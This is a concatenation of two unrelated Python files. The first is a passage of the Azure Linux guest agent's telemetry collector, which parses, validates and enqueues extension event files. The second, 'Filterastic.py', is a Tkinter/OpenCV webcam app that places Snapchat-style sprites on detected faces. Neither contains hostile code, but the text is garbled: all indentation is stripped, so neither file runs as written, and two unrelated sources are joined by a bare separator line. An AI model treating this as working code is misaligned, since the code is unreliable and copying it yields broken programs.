from azurelinuxagent.ga.periodic_operation import PeriodicOperation
def get_collect_telemetry_events_handler(send_telemetry_events_handler):
return CollectTelemetryEventsHandler(send_telemetry_events_handler)
class ExtensionEventSchema(object):
"""
Class for defining the schema for Extension Events.
Sample Extension Event Example:
{
"Version":"1.0.0.23",
"Timestamp":"2018-01-02T22:08:12.510696Z" //(time in UTC (ISO-8601 standard),
"TaskName":"TestRun" //Open for publishers,
"EventLevel":"Critical/Error/Warning/Verbose/Informational/LogAlways",
"Message": "Successful test" //(max 3K, 3072 characters),
"EventPid":"1",
"EventTid":"2",
"OperationId":"Guid (str)"
}
"""
Version = "Version"
Timestamp = "Timestamp"
TaskName = "TaskName"
EventLevel = "EventLevel"
Message = "Message"
EventPid = "EventPid"
EventTid = "EventTid"
OperationId = "OperationId"
class _ProcessExtensionEvents(PeriodicOperation):
"""
Periodic operation for collecting extension telemetry events and enqueueing them for the SendTelemetryHandler thread.
"""
_EXTENSION_EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=5)
_EXTENSION_EVENT_FILE_NAME_REGEX = re.compile(r"^(\d+)\.json$", re.IGNORECASE)
# Limits
_MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD = 300
_EXTENSION_EVENT_FILE_MAX_SIZE = 4 * 1024 * 1024 # 4 MB = 4 * 1,048,576 Bytes
_EXTENSION_EVENT_MAX_SIZE = 1024 * 6 # 6Kb or 6144 characters. Limit for the whole event. Prevent oversized events.
_EXTENSION_EVENT_MAX_MSG_LEN = 1024 * 3 # 3Kb or 3072 chars.
_EXTENSION_EVENT_REQUIRED_FIELDS = [attr.lower() for attr in dir(ExtensionEventSchema) if
not callable(getattr(ExtensionEventSchema, attr)) and not attr.startswith("__")]
def __init__(self, send_telemetry_events_handler):
super(_ProcessExtensionEvents, self).__init__(_ProcessExtensionEvents._EXTENSION_EVENT_COLLECTION_PERIOD)
self._send_telemetry_events_handler = send_telemetry_events_handler
def _operation(self):
if self._send_telemetry_events_handler.stopped():
logger.warn("{0} service is not running, skipping current iteration".format(
self._send_telemetry_events_handler.get_thread_name()))
return
delete_all_event_files = True
extension_handler_with_event_dirs = []
try:
extension_handler_with_event_dirs = self._get_extension_events_dir_with_handler_name(conf.get_ext_log_dir())
if not extension_handler_with_event_dirs:
logger.verbose("No Extension events directory exist")
return
for extension_handler_with_event_dir in extension_handler_with_event_dirs:
handler_name = extension_handler_with_event_dir[0]
handler_event_dir_path = extension_handler_with_event_dir[1]
self._capture_extension_events(handler_name, handler_event_dir_path)
except ServiceStoppedError:
# Since the service stopped, we should not delete the extension files and retry sending them whenever
# the telemetry service comes back up
delete_all_event_files = False
except Exception as error:
msg = "Unknown error occurred when trying to collect extension events. Error: {0}, Stack: {1}".format(
ustr(error), traceback.format_exc())
add_event(op=WALAEventOperation.ExtensionTelemetryEventProcessing, message=msg, is_success=False)
finally:
# Always ensure that the events directory are being deleted each run except when Telemetry Service is stopped,
# even if we run into an error and dont process them this run.
if delete_all_event_files:
self._ensure_all_events_directories_empty(extension_handler_with_event_dirs)
@staticmethod
def _get_extension_events_dir_with_handler_name(extension_log_dir):
"""
Get the full path to events directory for all extension handlers that have one
:param extension_log_dir: Base log directory for all extensions
:return: A list of full paths of existing events directory for all handlers
"""
extension_handler_with_event_dirs = []
for ext_handler_name in os.listdir(extension_log_dir):
# Check if its an Extension directory
if not os.path.isdir(os.path.join(extension_log_dir, ext_handler_name)) \
or re.match(HANDLER_NAME_PATTERN, ext_handler_name) is None:
continue
# Check if EVENTS_DIRECTORY directory exists
extension_event_dir = os.path.join(extension_log_dir, ext_handler_name, EVENTS_DIRECTORY)
if os.path.exists(extension_event_dir):
extension_handler_with_event_dirs.append((ext_handler_name, extension_event_dir))
return extension_handler_with_event_dirs
def _event_file_size_allowed(self, event_file_path):
event_file_size = os.stat(event_file_path).st_size
if event_file_size > self._EXTENSION_EVENT_FILE_MAX_SIZE:
convert_to_mb = lambda x: (1.0 * x) / (1000 * 1000)
msg = "Skipping file: {0} as its size is {1:.2f} Mb > Max size allowed {2:.1f} Mb".format(
event_file_path, convert_to_mb(event_file_size),
convert_to_mb(self._EXTENSION_EVENT_FILE_MAX_SIZE))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
return False
return True
def _capture_extension_events(self, handler_name, handler_event_dir_path):
"""
Capture Extension events and add them to the events_list
:param handler_name: Complete Handler Name. Eg: Microsoft.CPlat.Core.RunCommandLinux
:param handler_event_dir_path: Full path. Eg: '/var/log/azure/Microsoft.CPlat.Core.RunCommandLinux/events'
"""
# Filter out the files that do not follow the pre-defined EXTENSION_EVENT_FILE_NAME_REGEX
event_files = [event_file for event_file in os.listdir(handler_event_dir_path) if
re.match(self._EXTENSION_EVENT_FILE_NAME_REGEX, event_file) is not None]
# Pick the latest files first, we'll discard older events if len(events) > MAX_EVENT_COUNT
event_files.sort(reverse=True)
captured_extension_events_count = 0
dropped_events_with_error_count = defaultdict(int)
try:
for event_file in event_files:
event_file_path = os.path.join(handler_event_dir_path, event_file)
try:
logger.verbose("Processing event file: {0}", event_file_path)
if not self._event_file_size_allowed(event_file_path):
continue
# We support multiple events in a file, read the file and parse events.
captured_extension_events_count = self._enqueue_events_and_get_count(handler_name, event_file_path,
captured_extension_events_count,
dropped_events_with_error_count)
# We only allow MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD=300 maximum events per period per handler
if captured_extension_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
msg = "Reached max count for the extension: {0}; Max Limit: {1}. Skipping the rest.".format(
handler_name, self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD)
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
break
except ServiceStoppedError:
# Not logging here as already logged once, re-raising
# Since we already started processing this file, deleting it as we could've already sent some events out
# This is a trade-off between data replication vs data loss.
raise
except Exception as error:
msg = "Failed to process event file {0}: {1}, {2}".format(event_file, ustr(error),
traceback.format_exc())
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
finally:
# Todo: We should delete files after ensuring that we sent the data to Wireserver successfully
# from our end rather than deleting first and sending later. This is to ensure the data reliability
# of the agent telemetry pipeline.
os.remove(event_file_path)
finally:
if dropped_events_with_error_count:
msg = "Dropped events for Extension: {0}; Details:\n\t{1}".format(handler_name, '\n\t'.join(
["Reason: {0}; Dropped Count: {1}".format(k, v) for k, v in dropped_events_with_error_count.items()]))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
if captured_extension_events_count > 0:
logger.info("Collected {0} events for extension: {1}".format(captured_extension_events_count, handler_name))
@staticmethod
def _ensure_all_events_directories_empty(extension_events_directories):
if not extension_events_directories:
return
for extension_handler_with_event_dir in extension_events_directories:
event_dir_path = extension_handler_with_event_dir[1]
if not os.path.exists(event_dir_path):
return
log_err = True
# Delete any residue files in the events directory
for residue_file in os.listdir(event_dir_path):
try:
os.remove(os.path.join(event_dir_path, residue_file))
except Exception as error:
# Only log the first error once per handler per run to keep the logfile clean
if log_err:
logger.error("Failed to completely clear the {0} directory. Exception: {1}", event_dir_path,
ustr(error))
log_err = False
def _enqueue_events_and_get_count(self, handler_name, event_file_path, captured_events_count,
dropped_events_with_error_count):
event_file_time = datetime.datetime.fromtimestamp(os.path.getmtime(event_file_path))
# Read event file and decode it properly
with open(event_file_path, "rb") as event_file_descriptor:
event_data = event_file_descriptor.read().decode("utf-8")
# Parse the string and get the list of events
events = json.loads(event_data)
# We allow multiple events in a file but there can be an instance where the file only has a single
# JSON event and not a list. Handling that condition too
if not isinstance(events, list):
events = [events]
for event in events:
try:
self._send_telemetry_events_handler.enqueue_event(
self._parse_telemetry_event(handler_name, event, event_file_time)
)
captured_events_count += 1
except InvalidExtensionEventError as invalid_error:
# These are the errors thrown if there's an error parsing the event. We want to report these back to the
# extension publishers so that they are aware of the issues.
# The error messages are all static messages, we will use this to create a dict and emit an event at the
# end of each run to notify if there were any errors parsing events for the extension
dropped_events_with_error_count[ustr(invalid_error)] += 1
except ServiceStoppedError as stopped_error:
logger.error(
"Unable to enqueue events as service stopped: {0}. Stopping collecting extension events".format(
ustr(stopped_error)))
raise
except Exception as error:
logger.warn("Unable to parse and transmit event, error: {0}".format(error))
if captured_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
break
return captured_events_count
def _parse_telemetry_event(self, handler_name, extension_unparsed_event, event_file_time):
"""
Parse the Json event file and convert it to TelemetryEvent object with the required data.
:return: Complete TelemetryEvent with all required fields filled up properly. Raises if event breaches contract.
"""
extension_event = self._parse_event_and_ensure_it_is_valid(extension_unparsed_event)
# Create a telemetry event, add all common parameters to the event
# and then overwrite all the common params with extension events params if same
event = TelemetryEvent(TELEMETRY_LOG_EVENT_ID, TELEMETRY_LOG_PROVIDER_ID)
event.file_type = "json"
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(event, event_file_time)
replace_or_add_params = {
GuestAgentGenericLogsSchema.EventName: "{0}-{1}".format(handler_name, extension_event[
ExtensionEventSchema.Version.lower()]),
GuestAgentGenericLogsSchema.CapabilityUsed: extension_event[ExtensionEventSchema.EventLevel.lower()],
GuestAgentGenericLogsSchema.TaskName: extension_event[ExtensionEventSchema.TaskName.lower()],
GuestAgentGenericLogsSchema.Context1: extension_event[ExtensionEventSchema.Message.lower()],
GuestAgentGenericLogsSchema.Context2: extension_event[ExtensionEventSchema.Timestamp.lower()],
GuestAgentGenericLogsSchema.Context3: extension_event[ExtensionEventSchema.OperationId.lower()],
GuestAgentGenericLogsSchema.EventPid: extension_event[ExtensionEventSchema.EventPid.lower()],
GuestAgentGenericLogsSchema.EventTid: extension_event[ExtensionEventSchema.EventTid.lower()]
}
self._replace_or_add_param_in_event(event, replace_or_add_params)
return event
def _parse_event_and_ensure_it_is_valid(self, extension_event):
"""
Parse the Json event from file. Raise InvalidExtensionEventError if the event breaches pre-set contract.
:param extension_event: The json event from file
:return: Verified Json event that qualifies the contract.
"""
clean_string = lambda x: x.strip() if x is not None else x
event_size = 0
key_err_msg = "{0}: {1} not found"
# Convert the dict to all lower keys to avoid schema confusion.
# Only pick the params that we care about and skip the rest.
event = dict((k.lower(), clean_string(v)) for k, v in extension_event.items() if
k.lower() in self._EXTENSION_EVENT_REQUIRED_FIELDS)
# Trim message and only pick the first 3k chars
message_key = ExtensionEventSchema.Message.lower()
if message_key in event:
event[message_key] = event[message_key][:self._EXTENSION_EVENT_MAX_MSG_LEN]
else:
raise InvalidExtensionEventError(
key_err_msg.format(InvalidExtensionEventError.MissingKeyError, ExtensionEventSchema.Message))
if not event[message_key]:
raise InvalidExtensionEventError(
"{0}: {1} should not be empty".format(InvalidExtensionEventError.EmptyMessageError,
ExtensionEventSchema.Message))
for required_key in self._EXTENSION_EVENT_REQUIRED_FIELDS:
# If all required keys not in event then raise
if required_key not in event:
raise InvalidExtensionEventError(
key_err_msg.format(InvalidExtensionEventError.MissingKeyError, required_key))
# If the event_size > _EXTENSION_EVENT_MAX_SIZE=6k, then raise
if event_size > self._EXTENSION_EVENT_MAX_SIZE:
raise InvalidExtensionEventError(
"{0}: max event size allowed: {1}".format(InvalidExtensionEventError.OversizeEventError,
self._EXTENSION_EVENT_MAX_SIZE))
event_size += len(event[required_key])
return event
@staticmethod
def _replace_or_add_param_in_event(event, replace_or_add_params):
for param in event.parameters:
if param.name in replace_or_add_params:
param.value = replace_or_add_params.pop(param.name)
if not replace_or_add_params:
# All values replaced, return
return
# Add the remaining params to the event
for param_name in replace_or_add_params:
event.parameters.append(TelemetryEventParam(param_name, replace_or_add_params[param_name]))
class _CollectAndEnqueueEvents(PeriodicOperation):
"""
Periodic operation to collect telemetry events located in the events folder and enqueue them for the
SendTelemetryHandler thread.
"""
_EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=1)
def __init__(self, send_telemetry_events_handler):
super(_CollectAndEnqueueEvents, self).__init__(_CollectAndEnqueueEvents._EVENT_COLLECTION_PERIOD)
self._send_telemetry_events_handler = send_telemetry_events_handler
def _operation(self):
"""
Periodically send any events located in the events folder
"""
try:
if self._send_telemetry_events_handler.stopped():
logger.warn("{0} service is not running, skipping iteration.".format(
self._send_telemetry_events_handler.get_thread_name()))
return
self.process_events()
except Exception as error:
err_msg = "Failure in collecting telemetry events: {0}".format(ustr(error))
add_event(op=WALAEventOperation.UnhandledError, message=err_msg, is_success=False)
def process_events(self):
"""
Returns a list of events that need to be sent to the telemetry pipeline and deletes the corresponding files
from the events directory.
"""
event_directory_full_path = os.path.join(conf.get_lib_dir(), EVENTS_DIRECTORY)
event_files = os.listdir(event_directory_full_path)
debug_info = CollectOrReportEventDebugInfo(operation=CollectOrReportEventDebugInfo.OP_COLLECT)
for event_file in event_files:
try:
match = EVENT_FILE_REGEX.search(event_file)
if match is None:
continue
event_file_path = os.path.join(event_directory_full_path, event_file)
try:
logger.verbose("Processing event file: {0}", event_file_path)
with open(event_file_path, "rb") as event_fd:
event_data = event_fd.read().decode("utf-8")
event = parse_event(event_data)
# "legacy" events are events produced by previous versions of the agent (<= 2.2.46) and extensions;
# they do not include all the telemetry fields, so we add them here
is_legacy_event = match.group('agent_event') is None
if is_legacy_event:
# We'll use the file creation time for the event's timestamp
event_file_creation_time_epoch = os.path.getmtime(event_file_path)
event_file_creation_time = datetime.datetime.fromtimestamp(event_file_creation_time_epoch)
if event.is_extension_event():
_CollectAndEnqueueEvents._trim_legacy_extension_event_parameters(event)
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(event,
event_file_creation_time)
else:
_CollectAndEnqueueEvents._update_legacy_agent_event(event,
event_file_creation_time)
self._send_telemetry_events_handler.enqueue_event(event)
finally:
# Todo: We should delete files after ensuring that we sent the data to Wireserver successfully
# from our end rather than deleting first and sending later. This is to ensure the data reliability
# of the agent telemetry pipeline.
os.remove(event_file_path)
except ServiceStoppedError as stopped_error:
logger.error(
"Unable to enqueue events as service stopped: {0}, skipping events collection".format(
ustr(stopped_error)))
except UnicodeError as uni_err:
debug_info.update_unicode_error(uni_err)
except Exception as error:
debug_info.update_op_error(error)
debug_info.report_debug_info()
@staticmethod
def _update_legacy_agent_event(event, event_creation_time):
# Ensure that if an agent event is missing a field from the schema defined since 2.2.47, the missing fields
# will be appended, ensuring the event schema is complete before the event is reported.
new_event = TelemetryEvent()
new_event.parameters = []
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(new_event, event_creation_time)
event_params = dict([(param.name, param.value) for param in event.parameters])
new_event_params = dict([(param.name, param.value) for param in new_event.parameters])
missing_params = set(new_event_params.keys()).difference(set(event_params.keys()))
params_to_add = []
for param_name in missing_params:
params_to_add.append(TelemetryEventParam(param_name, new_event_params[param_name]))
event.parameters.extend(params_to_add)
@staticmethod
def _trim_legacy_extension_event_parameters(event):
"""
This method is called for extension events before they are sent out. Per the agreement with extension
publishers, the parameters that belong to extensions and will be reported intact are Name, Version, Operation,
OperationSuccess, Message, and Duration. Since there is nothing preventing extensions to instantiate other
fields (which belong to the agent), we call this method to ensure the rest of the parameters are trimmed since
they will be replaced with values coming from the agent.
:param event: Extension event to trim.
:return: Trimmed extension event; containing only extension-specific parameters.
"""
params_to_keep = dict().fromkeys([
GuestAgentExtensionEventsSchema.Name,
GuestAgentExtensionEventsSchema.Version,
GuestAgentExtensionEventsSchema.Operation,
GuestAgentExtensionEventsSchema.OperationSuccess,
GuestAgentExtensionEventsSchema.Message,
GuestAgentExtensionEventsSchema.Duration
])
trimmed_params = []
for param in event.parameters:
if param.name in params_to_keep:
trimmed_params.append(param)
event.parameters = trimmed_params
class CollectTelemetryEventsHandler(ThreadHandlerInterface):
"""
This Handler takes care of fetching the Extension Telemetry events from the {extension_events_dir} and sends it to
Kusto for advanced debuggability.
"""
_THREAD_NAME = "TelemetryEventsCollector"
def __init__(self, send_telemetry_events_handler):
self.should_run = True
self.thread = None
self._send_telemetry_events_handler = send_telemetry_events_handler
@staticmethod
def get_thread_name():
return CollectTelemetryEventsHandler._THREAD_NAME
def run(self):
logger.info("Start Extension Telemetry service.")
self.start()
def is_alive(self):
return self.thread is not None and self.thread.is_alive()
def start(self):
self.thread = threading.Thread(target=self.daemon)
self.thread.setDaemon(True)
self.thread.setName(CollectTelemetryEventsHandler.get_thread_name())
self.thread.start()
def stop(self):
"""
Stop server communication and join the thread to main thread.
"""
self.should_run = False
if self.is_alive():
self.thread.join()
def stopped(self):
return not self.should_run
def daemon(self):
periodic_operations = [
_CollectAndEnqueueEvents(self._send_telemetry_events_handler)
]
is_etp_enabled = get_supported_feature_by_name(SupportedFeatureNames.ExtensionTelemetryPipeline).is_supported
logger.info("Extension Telemetry pipeline enabled: {0}".format(is_etp_enabled))
if is_etp_enabled:
periodic_operations.append(_ProcessExtensionEvents(self._send_telemetry_events_handler))
logger.info("Successfully started the {0} thread".format(self.get_thread_name()))
while not self.stopped():
try:
for periodic_op in periodic_operations:
periodic_op.run()
except Exception as error:
logger.warn(
"An error occurred in the Telemetry Extension thread main loop; will skip the current iteration.\n{0}",
ustr(error))
finally:
PeriodicOperation.sleep_until_next_operation(periodic_operations)
@staticmethod
def add_common_params_to_telemetry_event(event, event_time):
reporter = get_event_logger()
reporter.add_common_event_parameters(event, event_time) |
Filterastic.py | # Libraries
from Tkinter import *
from PIL import Image
from PIL import ImageTk
import cv2, threading, os, time
from threading import Thread
previous=0
smile=0
def get_sprite(num):
global SPRITES
SPRITES[num] = (1 - SPRITES[num])
def smile_Detection(current):
global previous
global smile
global SPRITES
if(current==0 and previous==1):
smile=smile+1
if smile==16:
smile=0
SPRITES[smile-1]= 1
if smile>1:
SPRITES[smile-2]= 0
previous=current
# Applying filter
def transparentOverlay(src, overlay, pos=(0, 0), scale=1):
overlay = cv2.resize(overlay, (0, 0), fx=scale, fy=scale)
h, w, _ = overlay.shape
rows, cols, _ = src.shape
y, x = pos[0], pos[1]
for i in range(h):
for j in range(w):
if x + i >= rows or y + j >= cols:
continue
alpha = float(overlay[i][j][3] / 255.0)
src[x + i][y + j] = alpha * overlay[i][j][:3] + (1 - alpha) * src[x + i][y + j]
return src
# Main Program
def cvloop(run_event):
global panelA
global SPRITES
sc=0
cap = cv2.VideoCapture(0)
face_cascade = cv2.CascadeClassifier('Xml/haarcascade_frontalface_default.xml')
noseCascade = cv2.CascadeClassifier('Xml/haarcascade_mcs_nose.xml')
smile_cascade = cv2.CascadeClassifier('Xml/haarcascade_smile.xml')
while run_event.is_set(): #while the thread is active we loop
_, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(img, 1.1, 5)
for (x,y,w,h) in faces:
# Crown1 Filter
if SPRITES[0]:
crown = cv2.imread('Pics/Crown/crown.png', -1)
#crown = cv2.imread('s2.png', -1)
crown_roi_color = img[y-20:y+h/3, x-5:x+w]
crown = cv2.resize(crown, (w+20,int(h/2.2)),interpolation=cv2.INTER_CUBIC)
transparentOverlay(crown_roi_color,crown)
# Crown2 Filter
if SPRITES[1]:
crown = cv2.imread('Pics/Crown/crown2.png', -1)
crown_roi_color = img[y-20:y+h/3, x-5:x+w]
crown = cv2.resize(crown, (w+20,int(h/2)),interpolation=cv2.INTER_CUBIC)
transparentOverlay(crown_roi_color,crown)
# Crown3 Filter
if SPRITES[2]:
crown = cv2.imread('Pics/Crown/crown3.png', -1)
crown_roi_color = img[y-40:y+h+35, x-25:x+w+25]
crown = cv2.resize(crown, (w+50,int(h/2)),interpolation=cv2.INTER_CUBIC)
transparentOverlay(crown_roi_color,crown)
# Glass 1 Filter
if SPRITES[3]:
specs_ori = cv2.imread('Pics/Glasses/glass.png', -1)
glass_symin = int(y + 1.5 * h / 5)
glass_symax = int(y + 2.5 * h / 5)
sh_glass = glass_symax+30 - glass_symin
face_glass_roi_color = img[glass_symin-10:glass_symax+20, x:x+w]
specs = cv2.resize(specs_ori, (w, sh_glass),interpolation=cv2.INTER_CUBIC)
transparentOverlay(face_glass_roi_color,specs)
# Glass 2 Filter
if SPRITES[4]:
specs_ori = cv2.imread('Pics/Glasses/glass2.png', -1)
glass_symin = int(y + 1.5 * h / 5)
glass_symax = int(y + 2.5 * h / 5)
sh_glass = glass_symax+30 - glass_symin
face_glass_roi_color = img[glass_symin-10:glass_symax+20, x:x+w]
specs = cv2.resize(specs_ori, (w, sh_glass),interpolation=cv2.INTER_CUBIC)
transparentOverlay(face_glass_roi_color,specs)
# Glass 3 Filter
if SPRITES[5]:
specs_ori = cv2.imread('Pics/Glasses/glass3.png', -1)
glass_symin = int(y + 1.5 * h / 5)
glass_symax = int(y + 2.5 * h / 5)
sh_glass = glass_symax+30 - glass_symin
face_glass_roi_color = img[glass_symin-10:glass_symax+20, x:x+w]
specs = cv2.resize(specs_ori, (w, sh_glass),interpolation=cv2.INTER_CUBIC)
transparentOverlay(face_glass_roi_color,specs)
# Glass 4 Filter
if SPRITES[6]:
specs_ori = cv2.imread('Pics/Glasses/glass4.png', -1)
glass_symin = int(y + 1.5 * h / 5)
glass_symax = int(y + 2.5 * h / 5)
sh_glass = glass_symax+30 - glass_symin
face_glass_roi_color = img[glass_symin-10:glass_symax+20, x:x+w]
specs = cv2.resize(specs_ori, (w, sh_glass),interpolation=cv2.INTER_CUBIC)
transparentOverlay(face_glass_roi_color,specs)
# Hat 1 Filter
if SPRITES[7]:
hat = cv2.imread('Pics/Hat/hat1.png', -1)
face_glass_roi_color = img[y-110:y+10, x-45:x+w+60]
specs = cv2.resize(hat, (w+90 , 120),interpolation=cv2.INTER_CUBIC)
transparentOverlay(face_glass_roi_color,specs)
# Hat 2 Filter
if SPRITES[8]:
hat = cv2.imread('Pics/Hat/hat2.png', -1)
face_glass_roi_color = img[y-150:y, x+8:x+w+10]
specs = cv2.resize(hat, (w , 150),interpolation=cv2.INTER_CUBIC)
transparentOverlay(face_glass_roi_color,specs)
# Hat 3 Filter
if SPRITES[9]:
hat = cv2.imread('Pics/Hat/hat3.png', -1)
face_glass_roi_color = img[y-130:y+20, x-30:x+w+30]
specs = cv2.resize(hat, (w+50 , 150),interpolation=cv2.INTER_CUBIC)
transparentOverlay(face_glass_roi_color,specs)
# Hat 4 Filter
if SPRITES[10]:
hat = cv2.imread('Pics/Hat/hat4.png', -1)
face_glass_roi_color = img[y-110:y+70, x-10:x+w+20]
specs = cv2.resize(hat, (w+30 , 180),interpolation=cv2.INTER_CUBIC)
transparentOverlay(face_glass_roi_color,specs)
# Hat 5 Filter
if SPRITES[11]:
hat = cv2.imread('Pics/Hat/hat5.png', -1)
face_glass_roi_color = img[y-100:y+30, x-45:x+w+50]
specs = cv2.resize(hat, (w+80 , 130),interpolation=cv2.INTER_CUBIC)
transparentOverlay(face_glass_roi_color,specs)
# Mustache Filter
if SPRITES[12]:
imgMustache = cv2.imread('Pics/Mustache/mustache.png',-1)
orig_mask = imgMustache[:,:,3]
orig_mask_inv = cv2.bitwise_not(orig_mask)
imgMustache = imgMustache[:,:,0:3]
origMustacheHeight, origMustacheWidth = imgMustache.shape[:2]
roi_gray = gray[y:y+h, x:x+w]
roi_color = img[y:y+h, x:x+w]
nose = noseCascade.detectMultiScale(roi_gray)
for (nx,ny,nw,nh) in nose:
mustacheWidth = 2 * nw
mustacheHeight = mustacheWidth * origMustacheHeight / origMustacheWidth
x1 = nx - (mustacheWidth/4)
x2 = nx + nw + (mustacheWidth/4)
y1 = ny + nh - (mustacheHeight/2)
y2 = ny + nh + (mustacheHeight/2)
if x1 < 0:
x1 = 0
if y1 < 0:
y1 = 0
if x2 > w:
x2 = w
if y2 > h:
y2 = h
mustacheWidth = x2 - x1
mustacheHeight = y2 - y1
mustache = cv2.resize(imgMustache, (mustacheWidth,mustacheHeight), interpolation = cv2.INTER_AREA)
mask = cv2.resize(orig_mask, (mustacheWidth,mustacheHeight), interpolation = cv2.INTER_AREA)
mask_inv = cv2.resize(orig_mask_inv, (mustacheWidth,mustacheHeight), interpolation = cv2.INTER_AREA)
roi = roi_color[y1:y2, x1:x2]
roi_bg = cv2.bitwise_and(roi,roi,mask = mask_inv)
roi_fg = cv2.bitwise_and(mustache,mustache,mask = mask)
dst = cv2.add(roi_bg,roi_fg)
roi_color[y1:y2, x1:x2] = dst
break
# Animal 1 Filter
if SPRITES[13]:
hat = cv2.imread('Pics/Animal/dog.png', -1)
face_glass_roi_color = img[y-20:y+h, x-15:x+w+15]
specs = cv2.resize(hat, (w+15 , int(h/1.1)),interpolation=cv2.INTER_CUBIC)
transparentOverlay(face_glass_roi_color,specs)
# Animal 2 Filter
if SPRITES[14]:
hat = cv2.imread('Pics/Animal/cat.png', -1)
face_glass_roi_color = img[y-20:y+h+15, x-5:x+w+15]
specs = cv2.resize(hat, (w+15 , h),interpolation=cv2.INTER_CUBIC)
transparentOverlay(face_glass_roi_color,specs)
# Screen Shot
if SPRITES[15]:
sc=sc+1
cv2.imwrite('Screenshots/sc(%d).jpg'%sc,img)
SPRITES[9] = 0
# Smile I/O
if SPRITES[16]:
global previous
global smile
smiles = smile_cascade.detectMultiScale(
gray,
scaleFactor= 1.7,
minNeighbors=50,
minSize=(25, 25),
flags=cv2.CASCADE_SCALE_IMAGE
)
for (x,y,w,h) in smiles:
cv2.rectangle(img,(x,y),(x+w,y+h),(0,0,255),1)
if len(smiles) == 0:
#print "No Smile Detected"
smile_Detection(0)
else:
#print "SMILE : "+str(smiles.shape[0])
smile_Detection(1)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = Image.fromarray(img)
img = ImageTk.PhotoImage(img)
panelA.configure(image=img)
panelA.img = img
cap.release()
#GUI
app = Tk()
app.title("SnapChat")
# Video Feed
panelA = Label(app)
panelA.pack()
# GUI Buttons
#######################################################################################
## Crown Drop Down
crown1=ImageTk.PhotoImage(file="icons/crown1.png")
crown2=ImageTk.PhotoImage(file="icons/crown2.png")
crown3=ImageTk.PhotoImage(file="icons/crown3.png")
mb= Menubutton(app, text="Crowns", relief=RAISED)
mb.grid()
mb.menu = Menu ( mb, tearoff = 0 )
mb["menu"] = mb.menu
mb.menu.add_checkbutton ( image=crown1,label="Crown 1", command = lambda: get_sprite(0))
mb.menu.add_checkbutton ( image=crown2,label="Crown 2", command = lambda: get_sprite(1))
mb.menu.add_checkbutton ( image=crown3,label="Crown 3", command = lambda: get_sprite(2))
mb.pack(side="left", expand="no", padx="5", pady="5")
#######################################################################################
## Glasses Drop Down
glass1=ImageTk.PhotoImage(file="icons/glass1.png")
glass2=ImageTk.PhotoImage(file="icons/glass2.png")
glass3=ImageTk.PhotoImage(file="icons/glass3.png")
glass4=ImageTk.PhotoImage(file="icons/glass4.png")
mb2= Menubutton(app, text="Glasses", relief=RAISED)
mb2.grid()
mb2.menu = Menu ( mb2, tearoff = 0 )
mb2["menu"] = mb2.menu
mb2.menu.add_checkbutton ( image=glass1,label="Glass 1", command = lambda: get_sprite(3))
mb2.menu.add_checkbutton ( image=glass2,label="Glass 2", command = lambda: get_sprite(4))
mb2.menu.add_checkbutton ( image=glass3,label="Glass 3", command = lambda: get_sprite(5))
mb2.menu.add_checkbutton ( image=glass4,label="Glass 4", command = lambda: get_sprite(6))
mb2.pack(side="left", expand="no", padx="5", pady="5")
#######################################################################################
## Hats Drop Down
hat1=ImageTk.PhotoImage(file="icons/hat1.png")
hat2=ImageTk.PhotoImage(file="icons/hat2.png")
hat3=ImageTk.PhotoImage(file="icons/hat3.png")
hat4=ImageTk.PhotoImage(file="icons/hat4.png")
hat5=ImageTk.PhotoImage(file="icons/hat5.png")
mb3= Menubutton(app, text="Hats", relief=RAISED)
mb3.grid()
mb3.menu = Menu ( mb3, tearoff = 0 )
mb3["menu"] = mb3.menu
mb3.menu.add_checkbutton ( image=hat1,label="Hat 1", command = lambda: get_sprite(7))
mb3.menu.add_checkbutton ( image=hat2,label="Hat 2", command = lambda: get_sprite(8))
mb3.menu.add_checkbutton ( image=hat3,label="Hat 3", command = lambda: get_sprite(9))
mb3.menu.add_checkbutton ( image=hat4,label="Hat 4", command = lambda: get_sprite(10))
mb3.menu.add_checkbutton ( image=hat5,label="Hat 5", command = lambda: get_sprite(11))
mb3.pack(side="left", expand="no", padx="5", pady="5")
#######################################################################################
## Mustache Drop Down
mustache1=ImageTk.PhotoImage(file="icons/mustache1.png")
mb4= Menubutton(app, text="Mustache", relief=RAISED)
mb4.grid()
mb4.menu = Menu ( mb4, tearoff = 0 )
mb4["menu"] = mb4.menu
mb4.menu.add_checkbutton ( image=mustache1,label="Mustache 1", command = lambda: get_sprite(12))
mb4.pack(side="left", expand="no", padx="5", pady="5")
#######################################################################################
## Animal Drop Down
dog=ImageTk.PhotoImage(file="icons/dog.png")
cat=ImageTk.PhotoImage(file="icons/cat.png")
mb5= Menubutton(app, text="Animal", relief=RAISED)
mb5.grid()
mb5.menu = Menu ( mb5, tearoff = 0 )
mb5["menu"] = mb5.menu
mb5.menu.add_checkbutton ( image=dog,label="Dog", command = lambda: get_sprite(13))
mb5.menu.add_checkbutton ( image=cat,label="Cat", command = lambda: get_sprite(14))
mb5.pack(side="left", expand="no", padx="5", pady="5")
#######################################################################################
# Variable to control which sprite you want to visualize
SPRITES = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
# Creates a thread where the magic ocurs
run_event = threading.Event()
run_event.set()
action = Thread(target=cvloop, args=(run_event,))
action.setDaemon(True)
action.start()
# Function to close all properly, aka threads and GUI
def terminate():
global app, run_event, action
run_event.clear()
time.sleep(1)
app.destroy()
btn5 = Button(app, text="Exit",fg="red", command =terminate )
btn5.pack(side="left", expand="no", padx="10", pady="10")
